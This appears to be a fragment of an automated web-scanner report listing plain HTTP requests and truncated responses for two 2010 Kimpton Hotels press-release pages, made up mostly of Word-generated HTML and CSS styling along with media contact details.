mso-ascii-font-family:Consolas; mso-hansi-font-family:Consolas;}span.CharChar2 {mso-style-name:" Char Char2"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.kim111 {mso-style-name:kim111;}span.CharChar1 {mso-style-name:" Char Char1"; mso-style-noshow:yes; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.CharChar {mso-style-name:" Char Char"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.dfs111 {mso-style-name:dfs111; font-family:Verdana; mso-ascii-font-family:Verdana; mso-hansi-font-family:Verdana;} /* Page Definitions */@page {mso-footnote-separator:url(":images:header.htm") fs; mso-footnote-continuation-separator:url(":images:header.htm") fcs; mso-endnote-separator:url(":images:header.htm") es; mso-endnote-continuation-separator:url(":images:header.htm") ecs;}@page Section1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;}div.Section1 {page:Section1;} /* List Definitions */@list l0 {mso-list-id:-1802115189; mso-list-type:hybrid; mso-list-template-ids:201068776 -1 -1 -1 -1 -1 -1 -1 -1 -1;}@list l0:level1 {mso-level-suffix:none; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level2 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level3 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level4 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level5 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level6 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level7 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level8 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level9 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l1 {mso-list-id:854463416; mso-list-type:hybrid; mso-list-template-ids:-2144938804 197641 197641 328713 66569 197641 328713 66569 197641 328713;}@list l1:level1 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Arial;}@list l2 {mso-list-id:1030841178; mso-list-type:hybrid; mso-list-template-ids:1856390760 -1888849478 197641 328713 66569 197641 328713 66569 197641 328713;}@list l2:level1 {mso-level-number-format:bullet; mso-level-text:-; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Arial; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Symbol;}@list l2:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l3 {mso-list-id:1566069662; mso-list-type:hybrid; mso-list-template-ids:291660558 1253897630 197641 328713 66569 197641 328713 66569 197641 328713;}@list l3:level1 {mso-level-number-format:bullet; mso-level-text:\F0FC; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings;}@list l4 {mso-list-id:1636525908; mso-list-type:hybrid; mso-list-template-ids:2135300666 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l4:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:none; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l5 {mso-list-id:1929657465; mso-list-type:hybrid; mso-list-template-ids:1347988556 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l5:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}ol {margin-bottom:0in;}ul {margin-bottom:0in;}--></style><!--[if gte mso 10]><style> /* Style Definitions */table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin:0in; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Calibri; mso-hansi-font-family:Calibri;}</style><![endif]--><!--[if gte mso 9]><xml> <o:shapedefaults v:ext="edit" spidmax="2050"/></xml><![endif]--><!--[if gte mso 9]><xml> <o:shapelayout v:ext="edit"> <o:idmap v:ext="edit" data="1"/> </o:shapelayout></xml><![endif]--></head><body lang=EN-US link=blue vlink=purple style='tab-interval:.5in'><div class=Section1><p class=MsoNormal><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f"> <v:stroke joinstyle="miter"/> <v:formulas> <v:f eqn="if lineDrawn pixelLineWidth 0"/> <v:f eqn="sum @0 1 0"/> <v:f eqn="sum 0 0 @1"/> <v:f eqn="prod @2 1 2"/> <v:f eqn="prod @3 21600 pixelWidth"/> <v:f eqn="prod @3 21600 pixelHeight"/> <v:f eqn="sum @0 0 1"/> <v:f eqn="prod @6 1 2"/> <v:f eqn="prod @7 21600 pixelWidth"/> <v:f eqn="sum @8 21600 0"/> <v:f eqn="prod @7 21600 pixelHeight"/> <v:f eqn="sum @10 21600 0"/> </v:formulas> <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/> <o:lock v:ext="edit" aspectratio="t"/></v:shapetype><v:shape id="_x0000_i1025" type="#_x0000_t75" style='width:152pt; height:43pt'> <v:imagedata src="images/image001.jpg" o:title="Kimpton New Logo"/></v:shape><![endif]--><![if !vml]><img width=154 height=45src="images/image002.gif" v:shapes="_x0000_i1025"><![endif]></span></p><p class=MsoNormal><span style='font-size:8.0pt'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><b><span style='font-size:16.0pt;font-family:Arial;mso-bidi-font-family:Arial'>FOR IMMEDIATE RELEASE<o:p></o:p></span></b></p><p class=MsoNormal><b><span style='font-size:8.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial'>Media Contacts:</span></i><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p></o:p></span></i></p><p class=MsoNormal><b><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>Baltz&amp; Company for Kimpton<o:p></o:p></span></b></p><p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>ChloeMata Crane / 212-982-8300 x104 / <a href="mailto:cmcrane@baltzco.com">cmcrane@baltzco.com</a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<o:p></o:p></span></p><p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>MarlieseEngel Traver / 212-982-8300 x112 / <a href="mailto:mtraver@baltzco.com">mtraver@baltzco.com</a><b><o:p></o:p></b></span></p><p class=MsoNormal><b><span style='font-size:8.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal><b><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>KimptonHotels &amp; Restaurants<o:p></o:p></span></b></p><p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>StaceyEllis / 415-955-5492 / </span><a href="mailto:stacey.ellis@kimptongroup.com"><spanstyle='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:ital..
- /pdfs/press/html/Wines-That-Care-0210/

/pdfs/press/html/Wines-That-Care-0210/

http://www.kimptonhotels.com/pdfs/press/html/Wines-That-Care-0210/

Request

GET /pdfs/press/html/Wines-That-Care-0210/ HTTP/1.1
Referer: http://www.kimptonhotels.com/pdfs/press/html/Wines-That-Care-0210/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:10:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 38218
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40">

<head>
<meta name=Title content=" ">
<meta name=Keywords content="">
<meta http-equiv=Content-Type content="text/html; charset=macintosh">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 2008">
<meta name=Originator content="Microsoft Word 2008">
<link rel=File-List href="images/filelist.xml">
<link rel=Edit-Time-Data href="images/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
<![endif]-->
<title> </title>
<!--[if gte mso 9]><xml>
<o:DocumentProperties>
<o:Author> </o:Author>
<o:Template>Normal.dotm</o:Template>
<o:LastAuthor>Marie Chen</o:LastAuthor>
<o:Revision>2</o:Revision>
<o:TotalTime>3</o:TotalTime>
<o:LastPrinted>2010-02-09T22:23:00Z</o:LastPrinted>
<o:Created>2010-02-09T22:24:00Z</o:Created>
<o:LastSaved>2010-02-09T22:24:00Z</o:LastSaved>
<o:Pages>1</o:Pages>
<o:Words>1096</o:Words>
<o:Characters>6250</o:Characters>
<o:Lines>52</o:Lines>
<o:Paragraphs>12</o:Paragraphs>
<o:CharactersWithSpaces>7675</o:CharactersWithSpaces>
<o:Version>12.0</o:Version>
</o:DocumentProperties>
<o:OfficeDocumentSettings>
<o:PixelsPerInch>96</o:PixelsPerInch>
<o:TargetScreenSize>800x600</o:TargetScreenSize>
</o:OfficeDocumentSettings>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:Compatibility>
<w:UseNormalStyleForList/>
<w:DontUseIndentAsNumberingTabStop/>
<w:FELineBreak11/>
<w:WW11IndentRules/>
<w:DontAutofitConstrainedTables/>
<w:AutofitLikeWW11/>
<w:HangulWidthLikeWW11/>
</w:Compatibility>
</w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" LatentStyleCount="276">
</w:LatentStyles>
</xml><![endif]-->
<style>
<!--
/* Font Definitions */
@font-face
{font-family:Arial;
panose-1:2 11 6 4 2 2 2 2 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:"Courier New";
panose-1:2 7 3 9 2 2 5 2 4 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Times;
panose-1:2 0 5 0 0 0 0 0 0 0;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Wingdings;
panose-1:5 2 1 2 1 8 4 8 7 8;
mso-font-charset:2;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:0 0 65536 0 128 0;}
@font-face
{font-family:Verdana;
panose-1:2 11 6 4 3 5 4 4 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Calibri;
panose-1:2 15 5 2 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Tahoma;
panose-1:2 11 6 4 3 5 4 4 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:"Arial Unicode MS";
mso-font-charset:128;
mso-generic-font-family:swiss;
mso-font-pitch:variable;
mso-font-signature:-1 -23 1056964608 0 -16695552 0;}
@font-face
{font-family:Consolas;
panose-1:2 11 6 9 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{mso-style-parent:"";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
h1
{mso-margin-top-alt:auto;
margin-right:0in;
mso-margin-bottom-alt:auto;
margin-left:0in;
mso-pagination:widow-orphan;
mso-outline-level:1;
font-size:24.0pt;
font-family:"Arial Unicode MS";
mso-bidi-font-weight:bold;}
p.MsoCommentText, li.MsoCommentText, div.MsoCommentText
{mso-style-noshow:yes;
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
p.MsoHeader, li.MsoHeader, div.MsoHeader
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
tab-stops:center 3.25in right 6.5in;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
p.MsoFooter, li.MsoFooter, div.MsoFooter
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
tab-stops:center 3.25in right 6.5in;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
span.MsoCommentReference
{mso-style-noshow:yes;
mso-ansi-font-size:8.0pt;
mso-bidi-font-size:8.0pt;}
p.MsoBodyText, li.MsoBodyText, div.MsoBodyText
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:Arial;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Arial;
color:black;}
p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2
{margin-top:0in;
margin-right:0in;
margin-bottom:6.0pt;
margin-left:0in;
line-height:200%;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
a:link, span.MsoHyperlink
{color:blue;
text-decoration:underline;
text-underline:single;}
a:visited, span.MsoHyperlinkFollowed
{color:purple;
text-decoration:underline;
text-underline:single;}
strong
{mso-bidi-font-weight:bold;}
p.MsoPlainText, li.MsoPlainText, div.MsoPlainText
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.5pt;
font-family:"Times New Roman";
mso-ascii-font-family:Consolas;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Consolas;
mso-bidi-font-family:"Times New Roman";}
p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject
{mso-style-noshow:yes;
mso-style-parent:"Comment Text";
mso-style-next:"Comment Text";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;
font-weight:bold;}
p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
{mso-style-noshow:yes;
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:8.0pt;
font-family:Tahoma;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Tahoma;}
span.CharChar6
{mso-style-name:" Char Char6";
mso-ansi-font-size:24.0pt;
mso-bidi-font-size:24.0pt;
font-family:"Arial Unicode MS";
mso-ascii-font-family:"Arial Unicode MS";
mso-fareast-font-family:"Arial Unicode MS";
mso-hansi-font-family:"Arial Unicode MS";
mso-bidi-font-family:"Arial Unicode MS";
mso-font-kerning:18.0pt;
font-weight:bold;}
span.CharChar5
{mso-style-name:" Char Char5";
mso-style-noshow:yes;
font-family:Arial;
mso-ascii-font-family:Arial;
mso-hansi-font-family:Arial;
mso-bidi-font-family:Arial;
color:black;}
span.CharChar4
{mso-style-name:" Char Char4";
mso-style-noshow:yes;
mso-ansi-font-size:8.0pt;
mso-bidi-font-size:8.0pt;
font-family:Tahoma;
mso-ascii-font-family:Tahoma;
mso-hansi-font-family:Tahoma;
mso-bidi-font-family:Tahoma;}
span.CharChar3
{mso-style-name:" Char Char3";
mso-style-noshow:yes;
mso-ansi-font-size:10.5pt;
mso-bidi-font-size:10.5pt;
font-family:Consolas;
mso-ascii-font-family:Consolas;
mso-hansi-font-family:Consolas;}
span.CharChar2
{mso-style-name:" Char Char2";
mso-ansi-font-size:12.0pt;
mso-bidi-font-size:12.0pt;
font-family:Times;
mso-ascii-font-family:Times;
mso-hansi-font-family:Times;
mso-bidi-font-family:Times;}
span.kim111
{mso-style-name:kim111;}
span.CharChar1
{mso-style-name:" Char Char1";
mso-style-noshow:yes;
mso-ansi-font-size:12.0pt;
mso-bidi-font-size:12.0pt;
font-family:Times;
mso-ascii-font-family:Times;
mso-hansi-font-family:Times;
mso-bidi-font-family:Times;}
span.CharChar
{mso-style-name:" Char Char";
mso-ansi-font-size:12.0pt;
mso-bidi-font-size:12.0pt;
font-family:Times;
mso-ascii-font-family:Times;
mso-hansi-font-family:Times;
mso-bidi-font-family:Times;}
span.dfs111
{mso-style-name:dfs111;
font-family:Verdana;
mso-ascii-font-family:Verdana;
mso-hansi-font-family:Verdana;}
/* Page Definitions */
@page
{mso-footnote-separator:url(":images:header.htm") fs;
mso-footnote-continuation-separator:url(":images:header.htm") fcs;
mso-endnote-separator:url(":images:header.htm") es;
mso-endnote-continuation-separator:url(":images:header.htm") ecs;}
@page Section1
{size:8.5in 11.0in;
margin:1.0in 1.0in 1.0in 1.0in;
mso-header-margin:.5in;
mso-footer-margin:.5in;
mso-paper-source:0;}
div.Section1
{page:Section1;}
/* List Definitions */
@list l0
{mso-list-id:-1802115189;
mso-list-type:hybrid;
mso-list-template-ids:201068776 -1 -1 -1 -1 -1 -1 -1 -1 -1;}
@list l0:level1
{mso-level-suffix:none;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level2
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level3
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level4
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level5
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level6
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level7
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level8
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level9
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l1
{mso-list-id:28848037;
mso-list-type:hybrid;
mso-list-template-ids:182875624 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l1:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l1:level2
{mso-level-tab-stop:1.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l1:level3
{mso-level-tab-stop:1.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l1:level4
{mso-level-tab-stop:2.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l1:level5
{mso-level-tab-stop:2.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l1:level6
{mso-level-tab-stop:3.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l1:level7
{mso-level-tab-stop:3.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l1:level8
{mso-level-tab-stop:4.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l1:level9
{mso-level-tab-stop:4.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l2
{mso-list-id:854463416;
mso-list-type:hybrid;
mso-list-template-ids:-2144938804 197641 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l2:level1
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";
mso-bidi-font-family:"Courier New";}
@list l3
{mso-list-id:1030841178;
mso-list-type:hybrid;
mso-list-template-ids:1856390760 -1888849478 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l3:level1
{mso-level-number-format:bullet;
mso-level-text:-;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Arial;
mso-fareast-font-family:"Times New Roman";
mso-bidi-font-family:Arial;}
@list l3:level2
{mso-level-tab-stop:1.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l3:level3
{mso-level-tab-stop:1.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l3:level4
{mso-level-tab-stop:2.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l3:level5
{mso-level-tab-stop:2.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l3:level6
{mso-level-tab-stop:3.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l3:level7
{mso-level-tab-stop:3.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l3:level8
{mso-level-tab-stop:4.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l3:level9
{mso-level-tab-stop:4.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4
{mso-list-id:1566069662;
mso-list-type:hybrid;
mso-list-template-ids:291660558 1253897630 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l4:level1
{mso-level-number-format:bullet;
mso-level-text:\F0FC;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l5
{mso-list-id:1636525908;
mso-list-type:hybrid;
mso-list-template-ids:2135300666 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l5:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l6
{mso-list-id:1707218260;
mso-list-type:hybrid;
mso-list-template-ids:1001260830 1676557052 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l6:level1
{mso-level-start-at:0;
mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;
mso-fareast-font-family:"Times New Roman";
mso-bidi-font-family:Arial;}
@list l6:level2
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:1.0in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";
mso-bidi-font-family:"Courier New";}
@list l7
{mso-list-id:1929657465;
mso-list-type:hybrid;
mso-list-template-ids:1347988556 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l7:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
ol
{margin-bottom:0in;}
ul
{margin-bottom:0in;}
.style1 {
font-family: Arial;
font-size: 11.0pt;
}
-->
</style>
<!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin:0in;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:Calibri;
mso-hansi-..
- /pdfs/press/html/Sunday-Sleep-In-0410/index.html

/pdfs/press/html/Sunday-Sleep-In-0410/index.html

http://www.kimptonhotels.com/pdfs/press/html/Sunday-Sleep-In-0410/index.html

Request

GET /pdfs/press/html/Sunday-Sleep-In-0410/index.html HTTP/1.1
Referer: http://www.kimptonhotels.com/about-us/press-releases.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:10:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 34141
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882"
xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40">

<head>
<meta name=Title content=" ">
<meta name=Keywords content="">
<meta http-equiv=Content-Type content="text/html; charset=macintosh">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 2008">
<meta name=Originator content="Microsoft Word 2008">
<link rel=File-List href="images/filelist.xml">
<link rel=Edit-Time-Data href="images/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
<![endif]-->
<title> </title>
<!--[if gte mso 9]><xml>
<o:DocumentProperties>
<o:Author> </o:Author>
<o:Template>Normal.dotm</o:Template>
<o:LastAuthor>Marie Chen</o:LastAuthor>
<o:Revision>2</o:Revision>
<o:TotalTime>0</o:TotalTime>
<o:LastPrinted>2010-05-10T18:00:00Z</o:LastPrinted>
<o:Created>2010-05-10T18:01:00Z</o:Created>
<o:LastSaved>2010-05-10T18:01:00Z</o:LastSaved>
